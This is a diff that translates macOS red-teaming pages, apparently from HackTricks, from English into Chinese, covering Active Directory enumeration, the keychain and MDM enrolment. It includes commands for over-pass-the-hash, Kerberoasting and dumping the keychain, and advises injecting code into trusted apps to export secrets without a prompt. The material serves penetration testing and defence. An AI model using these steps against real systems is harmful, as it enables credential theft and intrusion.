without requiring any other framework or packages on the target. -- [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. - -### Domain Information +- [**Machound**](https://github.com/XMCyber/MacHound):MacHound是Bloodhound审计工具的扩展,允许在MacOS主机上收集和摄取Active Directory关系。 +- [**Bifrost**](https://github.com/its-a-feature/bifrost):Bifrost是一个Objective-C项目,旨在与macOS上的Heimdal krb5 API进行交互。该项目的目标是使用本机API在macOS设备上进行更好的Kerberos安全测试,而无需在目标上要求任何其他框架或软件包。 +- [**Orchard**](https://github.com/its-a-feature/Orchard):用于Active Directory枚举的JavaScript自动化(JXA)工具。 +### 域信息 ```bash echo show com.apple.opendirectoryd.ActiveDirectory | scutil ``` +### 用户 -### Users +MacOS 用户有三种类型: -The three types of MacOS users are: +- **本地用户** — 由本地 OpenDirectory 服务管理,与 Active Directory 没有任何连接。 +- **网络用户** — 易变的 Active Directory 用户,需要连接到 DC 服务器进行身份验证。 +- **移动用户** — 具有本地备份的 Active Directory 用户,用于其凭据和文件。 -- **Local Users** — Managed by the local OpenDirectory service, they aren’t connected in any way to the Active Directory. -- **Network Users** — Volatile Active Directory users who require a connection to the DC server to authenticate. -- **Mobile Users** — Active Directory users with a local backup for their credentials and files. +关于用户和组的本地信息存储在文件夹 _/var/db/dslocal/nodes/Default._\ +例如,名为 _mark_ 的用户信息存储在 _/var/db/dslocal/nodes/Default/users/mark.plist_ 中,组 _admin_ 的信息存储在 _/var/db/dslocal/nodes/Default/groups/admin.plist_ 中。 -The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._\ -For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. - -In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database: - -- **CanSSH** - entity allowed to SSH to host -- **CanVNC** - entity allowed to VNC to host -- **CanAE** - entity allowed to execute AppleEvent scripts on host +除了使用 HasSession 和 AdminTo 边缘,**MacHound 向 Bloodhound 数据库添加了三个新边缘**: +- **CanSSH** - 允许 SSH 连接到主机的实体 +- **CanVNC** - 允许 VNC 连接到主机的实体 +- **CanAE** - 允许在主机上执行 AppleEvent 脚本的实体 ```bash #User enumeration dscl . ls /Users @@ -182,71 +166,60 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" #Domain Information dsconfigad -show ``` +更多信息请访问 [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) -More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) - -### Computer$ password - -Get passwords using: +### Computer$ 密码 +使用以下方法获取密码: ```bash bifrost --action askhash --username [name] --password [password] --domain [domain] ``` - -It's possible to access the **`Computer$`** password inside the System keychain. +可以在系统钥匙串中访问 **`Computer$`** 密码。 ### Over-Pass-The-Hash -Get a TGT for an specific user and service: - +获取特定用户和服务的 TGT: ```bash bifrost --action asktgt --username [user] --domain [domain.com] \ - --hash [hash] --enctype [enctype] --keytab [/path/to/keytab] +--hash [hash] --enctype [enctype] --keytab [/path/to/keytab] ``` - -Once the TGT is gathered, it's possible to inject it in the current session with: - +一旦收集到 TGT,就可以通过以下方式将其注入当前会话: ```bash bifrost --action asktgt --username test_lab_admin \ - --hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \ - --enctype aes256 --domain test.lab.local +--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \ +--enctype aes256 --domain test.lab.local ``` - ### Kerberoasting - ```bash bifrost --action asktgs --spn [service] --domain [domain.com] \ - --username [user] --hash [hash] --enctype [enctype] +--username [user] --hash [hash] --enctype [enctype] ``` - -With obtained service tickets it's possible to try to access shares in other computers: - +通过获得的服务票证,可以尝试访问其他计算机上的共享: ```bash smbutil view //computer.fqdn mount -t smbfs //server/folder /local/mount/point ``` +## 访问钥匙串 -## Accessing the Keychain - -The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise: +钥匙串很可能包含敏感信息,如果在没有生成提示的情况下访问,可能有助于推进红队演习: {{#ref}} macos-keychain.md {{#endref}} -## External Services +## 外部服务 -MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin. +MacOS 红队与常规 Windows 红队不同,因为通常 **MacOS 直接与多个外部平台集成**。 MacOS 的常见配置是使用 **OneLogin 同步凭据访问计算机,并通过 OneLogin 访问多个外部服务**(如 github, aws...)。 -## Misc Red Team techniques +## 其他红队技术 ### Safari -When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: +当在 Safari 中下载文件时,如果是“安全”文件,它将 **自动打开**。例如,如果你 **下载一个 zip 文件**,它将自动解压缩:
-## References +## 参考文献 - [**https://www.youtube.com/watch?v=IiMladUbL6E**](https://www.youtube.com/watch?v=IiMladUbL6E) - [**https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6**](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6) @@ -254,12 +227,5 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati - [**Come to the Dark Side, We Have Apples: Turning macOS Management Evil**](https://www.youtube.com/watch?v=pOQOh07eMxY) - [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA) -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-red-teaming/macos-keychain.md b/src/macos-hardening/macos-red-teaming/macos-keychain.md index a6135959d..cd35e4194 100644 --- a/src/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/src/macos-hardening/macos-red-teaming/macos-keychain.md @@ -4,60 +4,59 @@ ## Main Keychains -- The **User Keychain** (`~/Library/Keychains/login.keychain-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys. -- The **System Keychain** (`/Library/Keychains/System.keychain`), which stores **system-wide credentials** such as WiFi passwords, system root certificates, system private keys, and system application passwords. - - It's possible to find other components like certificates in `/System/Library/Keychains/*` -- In **iOS** there is only one **Keychain** located in `/private/var/Keychains/`. This folder also contains databases for the `TrustStore`, certificates authorities (`caissuercache`) and OSCP entries (`ocspache`). - - Apps will be restricted in the keychain only to their private area based on their application identifier. +- **用户钥匙串** (`~/Library/Keychains/login.keychain-db`),用于存储 **用户特定的凭据**,如应用程序密码、互联网密码、用户生成的证书、网络密码和用户生成的公钥/私钥。 +- **系统钥匙串** (`/Library/Keychains/System.keychain`),存储 **系统范围的凭据**,如 WiFi 密码、系统根证书、系统私钥和系统应用程序密码。 +- 可以在 `/System/Library/Keychains/*` 中找到其他组件,如证书。 +- 在 **iOS** 中只有一个 **钥匙串**,位于 `/private/var/Keychains/`。此文件夹还包含 `TrustStore` 的数据库、证书颁发机构 (`caissuercache`) 和 OSCP 条目 (`ocspache`)。 +- 应用程序在钥匙串中的访问将仅限于其基于应用程序标识符的私有区域。 ### Password Keychain Access -These files, while they do not have inherent protection and can be **downloaded**, are encrypted and require the **user's plaintext password to be decrypted**. A tool like [**Chainbreaker**](https://github.com/n0fate/chainbreaker) could be used for decryption. +这些文件虽然没有固有的保护并且可以被 **下载**,但它们是加密的,需要 **用户的明文密码进行解密**。可以使用像 [**Chainbreaker**](https://github.com/n0fate/chainbreaker) 这样的工具进行解密。 ## Keychain Entries Protections ### ACLs -Each entry in the keychain is governed by **Access Control Lists (ACLs)** which dictate who can perform various actions on the keychain entry, including: +钥匙串中的每个条目都受 **访问控制列表 (ACLs)** 的管理,这些列表规定了谁可以对钥匙串条目执行各种操作,包括: -- **ACLAuhtorizationExportClear**: Allows the holder to get the clear text of the secret. -- **ACLAuhtorizationExportWrapped**: Allows the holder to get the clear text encrypted with another provided password. -- **ACLAuhtorizationAny**: Allows the holder to perform any action. +- **ACLAuhtorizationExportClear**:允许持有者获取秘密的明文。 +- **ACLAuhtorizationExportWrapped**:允许持有者获取用另一个提供的密码加密的明文。 +- **ACLAuhtorizationAny**:允许持有者执行任何操作。 -The ACLs are further accompanied by a **list of trusted applications** that can perform these actions without prompting. This could be: +ACLs 还附带一个 **受信任应用程序列表**,可以在不提示的情况下执行这些操作。可能是: -- **N`il`** (no authorization required, **everyone is trusted**) -- An **empty** list (**nobody** is trusted) -- **List** of specific **applications**. +- **N`il`**(不需要授权,**所有人都被信任**) +- 一个 **空** 列表(**没有人**被信任) +- **特定应用程序** 的 **列表**。 -Also the entry might contain the key **`ACLAuthorizationPartitionID`,** which is use to identify the **teamid, apple,** and **cdhash.** +条目还可能包含键 **`ACLAuthorizationPartitionID`**,用于识别 **teamid、apple** 和 **cdhash**。 -- If the **teamid** is specified, then in order to **access the entry** value **withuot** a **prompt** the used application must have the **same teamid**. -- If the **apple** is specified, then the app needs to be **signed** by **Apple**. -- If the **cdhash** is indicated, then **app** must have the specific **cdhash**. +- 如果指定了 **teamid**,则为了 **在不提示的情况下访问条目** 值,使用的应用程序必须具有 **相同的 teamid**。 +- 如果指定了 **apple**,则应用程序需要由 **Apple** 签名。 +- 如果指明了 **cdhash**,则 **应用程序** 必须具有特定的 **cdhash**。 ### Creating a Keychain Entry -When a **new** **entry** is created using **`Keychain Access.app`**, the following rules apply: +当使用 **`Keychain Access.app`** 创建 **新** **条目** 时,适用以下规则: -- All apps can encrypt. -- **No apps** can export/decrypt (without prompting the user). -- All apps can see the integrity check. -- No apps can change ACLs. -- The **partitionID** is set to **`apple`**. +- 所有应用程序都可以加密。 +- **没有应用程序** 可以导出/解密(在不提示用户的情况下)。 +- 所有应用程序都可以查看完整性检查。 +- 没有应用程序可以更改 ACLs。 +- **partitionID** 设置为 **`apple`**。 -When an **application creates an entry in the keychain**, the rules are slightly different: +当 **应用程序在钥匙串中创建条目** 时,规则略有不同: -- All apps can encrypt. -- Only the **creating application** (or any other apps explicitly added) can export/decrypt (without prompting the user). -- All apps can see the integrity check. -- No apps can change the ACLs. -- The **partitionID** is set to **`teamid:[teamID here]`**. +- 所有应用程序都可以加密。 +- 只有 **创建应用程序**(或任何其他明确添加的应用程序)可以导出/解密(在不提示用户的情况下)。 +- 所有应用程序都可以查看完整性检查。 +- 没有应用程序可以更改 ACLs。 +- **partitionID** 设置为 **`teamid:[teamID here]`**。 ## Accessing the Keychain ### `security` - ```bash # List keychains security list-keychains @@ -74,58 +73,57 @@ security set-generic-password-parition-list -s "test service" -a "test acount" - # Dump specifically the user keychain security dump-keychain ~/Library/Keychains/login.keychain-db ``` - ### APIs > [!TIP] -> The **keychain enumeration and dumping** of secrets that **won't generate a prompt** can be done with the tool [**LockSmith**](https://github.com/its-a-feature/LockSmith) +> **密钥链枚举和秘密转储**可以使用工具 [**LockSmith**](https://github.com/its-a-feature/LockSmith) 完成,这不会生成提示。 > -> Other API endpoints can be found in [**SecKeyChain.h**](https://opensource.apple.com/source/libsecurity_keychain/libsecurity_keychain-55017/lib/SecKeychain.h.auto.html) source code. +> 其他 API 端点可以在 [**SecKeyChain.h**](https://opensource.apple.com/source/libsecurity_keychain/libsecurity_keychain-55017/lib/SecKeychain.h.auto.html) 源代码中找到。 -List and get **info** about each keychain entry using the **Security Framework** or you could also check the Apple's open source cli tool [**security**](https://opensource.apple.com/source/Security/Security-59306.61.1/SecurityTool/macOS/security.c.auto.html)**.** Some API examples: +使用 **Security Framework** 列出并获取每个密钥链条目的 **信息**,或者您也可以检查苹果的开源 CLI 工具 [**security**](https://opensource.apple.com/source/Security/Security-59306.61.1/SecurityTool/macOS/security.c.auto.html)**。** 一些 API 示例: -- The API **`SecItemCopyMatching`** gives info about each entry and there are some attributes you can set when using it: - - **`kSecReturnData`**: If true, it will try to decrypt the data (set to false to avoid potential pop-ups) - - **`kSecReturnRef`**: Get also reference to keychain item (set to true in case later you see you can decrypt without pop-up) - - **`kSecReturnAttributes`**: Get metadata about entries - - **`kSecMatchLimit`**: How many results to return - - **`kSecClass`**: What kind of keychain entry +- API **`SecItemCopyMatching`** 提供有关每个条目的信息,并且在使用时可以设置一些属性: +- **`kSecReturnData`**:如果为真,它将尝试解密数据(设置为假以避免潜在的弹出窗口) +- **`kSecReturnRef`**:还获取密钥链项的引用(如果稍后您看到可以在没有弹出窗口的情况下解密,则设置为真) +- **`kSecReturnAttributes`**:获取条目的元数据 +- **`kSecMatchLimit`**:返回多少结果 +- **`kSecClass`**:什么类型的密钥链条目 -Get **ACLs** of each entry: +获取每个条目的 **ACL**: -- With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has: - - Description - - **Trusted Application List**. This could be: - - An app: /Applications/Slack.app - - A binary: /usr/libexec/airportd - - A group: group://AirPort +- 使用 API **`SecAccessCopyACLList`**,您可以获取 **密钥链项的 ACL**,它将返回一个 ACL 列表(如 `ACLAuhtorizationExportClear` 和之前提到的其他项),每个列表包含: +- 描述 +- **受信任的应用程序列表**。这可以是: +- 应用程序:/Applications/Slack.app +- 二进制文件:/usr/libexec/airportd +- 组:group://AirPort -Export the data: +导出数据: -- The API **`SecKeychainItemCopyContent`** gets the plaintext -- The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted +- API **`SecKeychainItemCopyContent`** 获取明文 +- API **`SecItemExport`** 导出密钥和证书,但可能需要设置密码以加密导出内容 -And these are the **requirements** to be able to **export a secret without a prompt**: +这些是能够 **在没有提示的情况下导出秘密** 的 **要求**: -- If **1+ trusted** apps listed: - - Need the appropriate **authorizations** (**`Nil`**, or be **part** of the allowed list of apps in the authorization to access the secret info) - - Need code signature to match **PartitionID** - - Need code signature to match that of one **trusted app** (or be a member of the right KeychainAccessGroup) -- If **all applications trusted**: - - Need the appropriate **authorizations** - - Need code signature to match **PartitionID** - - If **no PartitionID**, then this isn't needed +- 如果 **1+ 个受信任** 应用程序列出: +- 需要适当的 **授权**(**`Nil`**,或是 **允许** 访问秘密信息的应用程序列表的一部分) +- 需要代码签名与 **PartitionID** 匹配 +- 需要代码签名与一个 **受信任的应用程序** 的匹配(或是正确的 KeychainAccessGroup 的成员) +- 如果 **所有应用程序受信任**: +- 需要适当的 **授权** +- 需要代码签名与 **PartitionID** 匹配 +- 如果 **没有 PartitionID**,则不需要 > [!CAUTION] -> Therefore, if there is **1 application listed**, you need to **inject code in that application**. +> 因此,如果列出了 **1 个应用程序**,您需要 **在该应用程序中注入代码**。 > -> If **apple** is indicated in the **partitionID**, you could access it with **`osascript`** so anything that is trusting all applications with apple in the partitionID. **`Python`** could also be used for this. +> 如果 **apple** 在 **partitionID** 中被指示,您可以使用 **`osascript`** 访问它,因此任何信任所有应用程序且在 partitionID 中包含 apple 的内容。**`Python`** 也可以用于此。 -### Two additional attributes +### 两个额外属性 -- **Invisible**: It's a boolean flag to **hide** the entry from the **UI** Keychain app -- **General**: It's to store **metadata** (so it's NOT ENCRYPTED) - - Microsoft was storing in plain text all the refresh tokens to access sensitive endpoint. +- **Invisible**:这是一个布尔标志,用于 **隐藏** 密钥链应用程序中的条目 +- **General**:用于存储 **元数据**(因此它不是加密的) +- 微软以明文存储所有访问敏感端点的刷新令牌。 ## References diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md index 1a4f69c6e..e30455a9d 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -2,199 +2,199 @@ {{#include ../../../banners/hacktricks-training.md}} -**To learn about macOS MDMs check:** +**要了解 macOS MDM,请查看:** - [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) - [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe) -## Basics +## 基础知识 -### **MDM (Mobile Device Management) Overview** +### **MDM(移动设备管理)概述** -[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) is utilized for overseeing various end-user devices like smartphones, laptops, and tablets. Particularly for Apple's platforms (iOS, macOS, tvOS), it involves a set of specialized features, APIs, and practices. The operation of MDM hinges on a compatible MDM server, which is either commercially available or open-source, and must support the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Key points include: +[移动设备管理](https://en.wikipedia.org/wiki/Mobile_device_management)(MDM)用于管理各种终端用户设备,如智能手机、笔记本电脑和平板电脑。特别是对于苹果的平台(iOS、macOS、tvOS),它涉及一套专门的功能、API 和实践。MDM 的操作依赖于一个兼容的 MDM 服务器,该服务器可以是商业可用的或开源的,并且必须支持 [MDM 协议](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)。关键点包括: -- Centralized control over devices. -- Dependence on an MDM server that adheres to the MDM protocol. -- Capability of the MDM server to dispatch various commands to devices, for instance, remote data erasure or configuration installation. +- 对设备的集中控制。 +- 依赖于遵循 MDM 协议的 MDM 服务器。 +- MDM 服务器能够向设备发送各种命令,例如远程数据擦除或配置安装。 -### **Basics of DEP (Device Enrollment Program)** +### **DEP(设备注册计划)基础知识** -The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) offered by Apple streamlines the integration of Mobile Device Management (MDM) by facilitating zero-touch configuration for iOS, macOS, and tvOS devices. DEP automates the enrollment process, allowing devices to be operational right out of the box, with minimal user or administrative intervention. Essential aspects include: +苹果提供的 [设备注册计划](https://www.apple.com/business/site/docs/DEP_Guide.pdf)(DEP)通过为 iOS、macOS 和 tvOS 设备提供零接触配置,简化了移动设备管理(MDM)的集成。DEP 自动化注册过程,使设备在开箱即用时即可操作,最小化用户或管理干预。基本方面包括: -- Enables devices to autonomously register with a pre-defined MDM server upon initial activation. -- Primarily beneficial for brand-new devices, but also applicable for devices undergoing reconfiguration. -- Facilitates a straightforward setup, making devices ready for organizational use swiftly. +- 使设备在首次激活时能够自动注册到预定义的 MDM 服务器。 +- 主要对全新设备有利,但也适用于正在重新配置的设备。 +- 促进简单的设置,使设备迅速准备好用于组织。 -### **Security Consideration** +### **安全考虑** -It's crucial to note that the ease of enrollment provided by DEP, while beneficial, can also pose security risks. If protective measures are not adequately enforced for MDM enrollment, attackers might exploit this streamlined process to register their device on the organization's MDM server, masquerading as a corporate device. +需要注意的是,DEP 提供的注册便利性虽然有利,但也可能带来安全风险。如果没有充分执行保护措施,攻击者可能利用这一简化过程在组织的 MDM 服务器上注册他们的设备,伪装成企业设备。 > [!CAUTION] -> **Security Alert**: Simplified DEP enrollment could potentially allow unauthorized device registration on the organization's MDM server if proper safeguards are not in place. +> **安全警报**:如果没有适当的保护措施,简化的 DEP 注册可能允许未经授权的设备在组织的 MDM 服务器上注册。 -### Basics What is SCEP (Simple Certificate Enrolment Protocol)? +### 基础知识 什么是 SCEP(简单证书注册协议)? -- A relatively old protocol, created before TLS and HTTPS were widespread. -- Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate. +- 一种相对较旧的协议,创建于 TLS 和 HTTPS 广泛使用之前。 +- 为客户端提供了一种标准化的方式来发送 **证书签名请求**(CSR),以获得证书。客户端将请求服务器为其提供签名证书。 -### What are Configuration Profiles (aka mobileconfigs)? +### 什么是配置文件(即 mobileconfigs)? -- Apple’s official way of **setting/enforcing system configuration.** -- File format that can contain multiple payloads. -- Based on property lists (the XML kind). -- “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018. +- 苹果官方的 **设置/强制系统配置** 的方式。 +- 可以包含多个有效负载的文件格式。 +- 基于属性列表(XML 类型)。 +- “可以被签名和加密以验证其来源,确保其完整性,并保护其内容。” 基础知识 — 第 70 页,iOS 安全指南,2018 年 1 月。 -## Protocols +## 协议 ### MDM -- Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers) -- **Communication** occurs between a **device** and a server associated with a **device** **management** **product** -- **Commands** delivered from the MDM to the device in **plist-encoded dictionaries** -- All over **HTTPS**. MDM servers can be (and are usually) pinned. -- Apple grants the MDM vendor an **APNs certificate** for authentication +- APNs(**苹果服务器**)+ RESTful API(**MDM** **供应商**服务器)的组合 +- **通信**发生在 **设备** 和与 **设备管理** **产品** 相关的服务器之间 +- **命令**以 **plist 编码字典** 的形式从 MDM 发送到设备 +- 所有通信通过 **HTTPS**。MDM 服务器可以(并且通常会)进行固定。 +- 苹果向 MDM 供应商授予 **APNs 证书** 以进行身份验证 ### DEP -- **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented): - - The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices. - - The [DEP API used by Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) to enroll devices, check enrollment status, and check transaction status. - - The undocumented private DEP API. This is used by Apple Devices to request their DEP profile. On macOS, the `cloudconfigurationd` binary is responsible for communicating over this API. -- More modern and **JSON** based (vs. plist) -- Apple grants an **OAuth token** to the MDM vendor +- **3 个 API**:1 个用于经销商,1 个用于 MDM 供应商,1 个用于设备身份(未记录): +- 所谓的 [DEP "云服务" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)。MDM 服务器使用此 API 将 DEP 配置文件与特定设备关联。 +- [苹果授权经销商使用的 DEP API](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html),用于注册设备、检查注册状态和检查交易状态。 +- 未记录的私有 DEP API。苹果设备使用此 API 请求其 DEP 配置文件。在 macOS 上,`cloudconfigurationd` 二进制文件负责通过此 API 进行通信。 +- 更现代且基于 **JSON**(与 plist 相比) +- 苹果向 MDM 供应商授予 **OAuth 令牌** -**DEP "cloud service" API** +**DEP "云服务" API** - RESTful -- sync device records from Apple to the MDM server -- sync “DEP profiles” to Apple from the MDM server (delivered by Apple to the device later on) -- A DEP “profile” contains: - - MDM vendor server URL - - Additional trusted certificates for server URL (optional pinning) - - Extra settings (e.g. which screens to skip in Setup Assistant) +- 从苹果同步设备记录到 MDM 服务器 +- 从 MDM 服务器同步“DEP 配置文件”到苹果(稍后由苹果传递给设备) +- 一个 DEP “配置文件”包含: +- MDM 供应商服务器 URL +- 服务器 URL 的附加受信任证书(可选固定) +- 额外设置(例如,跳过设置助手中的哪些屏幕) -## Serial Number +## 序列号 -Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. +2010 年后制造的苹果设备通常具有 **12 个字符的字母数字** 序列号,**前三个数字表示制造地点**,接下来的 **两个** 表示 **制造的年份** 和 **周数**,接下来的 **三个** 数字提供一个 **唯一的** **标识符**,最后 **四个** 数字表示 **型号**。 {{#ref}} macos-serial-number.md {{#endref}} -## Steps for enrolment and management +## 注册和管理步骤 -1. Device record creation (Reseller, Apple): The record for the new device is created -2. Device record assignment (Customer): The device is assigned to a MDM server -3. Device record sync (MDM vendor): MDM sync the device records and push the DEP profiles to Apple -4. DEP check-in (Device): Device gets his DEP profile -5. Profile retrieval (Device) -6. Profile installation (Device) a. incl. MDM, SCEP and root CA payloads -7. MDM command issuance (Device) +1. 设备记录创建(经销商,苹果):为新设备创建记录 +2. 设备记录分配(客户):将设备分配给 MDM 服务器 +3. 设备记录同步(MDM 供应商):MDM 同步设备记录并将 DEP 配置文件推送到苹果 +4. DEP 签到(设备):设备获取其 DEP 配置文件 +5. 配置文件检索(设备) +6. 配置文件安装(设备) a. 包括 MDM、SCEP 和根 CA 有效负载 +7. MDM 命令发布(设备) ![](<../../../images/image (694).png>) -The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process. +文件 `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` 导出可以被视为 **高层次的“步骤”** 的注册过程的函数。 -### Step 4: DEP check-in - Getting the Activation Record +### 第 4 步:DEP 签到 - 获取激活记录 -This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe) +该过程发生在 **用户首次启动 Mac 时**(或在完全擦除后) ![](<../../../images/image (1044).png>) -or when executing `sudo profiles show -type enrollment` +或在执行 `sudo profiles show -type enrollment` 时 -- Determine **whether device is DEP enabled** -- Activation Record is the internal name for **DEP “profile”** -- Begins as soon as the device is connected to Internet -- Driven by **`CPFetchActivationRecord`** -- Implemented by **`cloudconfigurationd`** via XPC. The **"Setup Assistant**" (when the device is firstly booted) or the **`profiles`** command will **contact this daemon** to retrieve the activation record. - - LaunchDaemon (always runs as root) +- 确定 **设备是否启用 DEP** +- 激活记录是 **DEP “配置文件”** 的内部名称 +- 一旦设备连接到互联网就开始 +- 由 **`CPFetchActivationRecord`** 驱动 +- 通过 XPC 由 **`cloudconfigurationd`** 实现。**“设置助手”**(当设备首次启动时)或 **`profiles`** 命令将 **联系此守护进程** 以检索激活记录。 +- LaunchDaemon(始终以 root 身份运行) -It follows a few steps to get the Activation Record performed by **`MCTeslaConfigurationFetcher`**. This process uses an encryption called **Absinthe** +它遵循几个步骤来获取激活记录,由 **`MCTeslaConfigurationFetcher`** 执行。此过程使用一种称为 **Absinthe** 的加密 -1. Retrieve **certificate** - 1. GET [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) -2. **Initialize** state from certificate (**`NACInit`**) - 1. Uses various device-specific data (i.e. **Serial Number via `IOKit`**) -3. Retrieve **session key** - 1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) -4. Establish the session (**`NACKeyEstablishment`**) -5. Make the request - 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` - 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) - 3. All requests over HTTPs, built-in root certificates are used +1. 检索 **证书** +1. GET [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) +2. **初始化** 状态来自证书(**`NACInit`**) +1. 使用各种设备特定数据(即 **通过 `IOKit` 的序列号**) +3. 检索 **会话密钥** +1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) +4. 建立会话(**`NACKeyEstablishment`**) +5. 发出请求 +1. POST 到 [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile),发送数据 `{ "action": "RequestProfileConfiguration", "sn": "" }` +2. JSON 有效负载使用 Absinthe 加密(**`NACSign`**) +3. 所有请求通过 HTTPs,使用内置根证书 ![](<../../../images/image (566) (1).png>) -The response is a JSON dictionary with some important data like: +响应是一个 JSON 字典,包含一些重要数据,如: -- **url**: URL of the MDM vendor host for the activation profile -- **anchor-certs**: Array of DER certificates used as trusted anchors +- **url**:激活配置文件的 MDM 供应商主机的 URL +- **anchor-certs**:用作受信任锚的 DER 证书数组 -### **Step 5: Profile Retrieval** +### **第 5 步:配置文件检索** ![](<../../../images/image (444).png>) -- Request sent to **url provided in DEP profile**. -- **Anchor certificates** are used to **evaluate trust** if provided. - - Reminder: the **anchor_certs** property of the DEP profile -- **Request is a simple .plist** with device identification - - Examples: **UDID, OS version**. -- CMS-signed, DER-encoded -- Signed using the **device identity certificate (from APNS)** -- **Certificate chain** includes expired **Apple iPhone Device CA** +- 请求发送到 **DEP 配置文件中提供的 URL**。 +- **锚证书** 用于 **评估信任**(如果提供)。 +- 提醒:**DEP 配置文件的 anchor_certs 属性** +- **请求是一个简单的 .plist**,包含设备识别信息 +- 示例:**UDID、操作系统版本**。 +- CMS 签名,DER 编码 +- 使用 **设备身份证书(来自 APNS)** 签名 +- **证书链** 包括过期的 **Apple iPhone Device CA** -![](<../../../images/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2).png>) +![](<../../../images/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2).png>) -### Step 6: Profile Installation +### 第 6 步:配置文件安装 -- Once retrieved, **profile is stored on the system** -- This step begins automatically (if in **setup assistant**) -- Driven by **`CPInstallActivationProfile`** -- Implemented by mdmclient over XPC - - LaunchDaemon (as root) or LaunchAgent (as user), depending on context 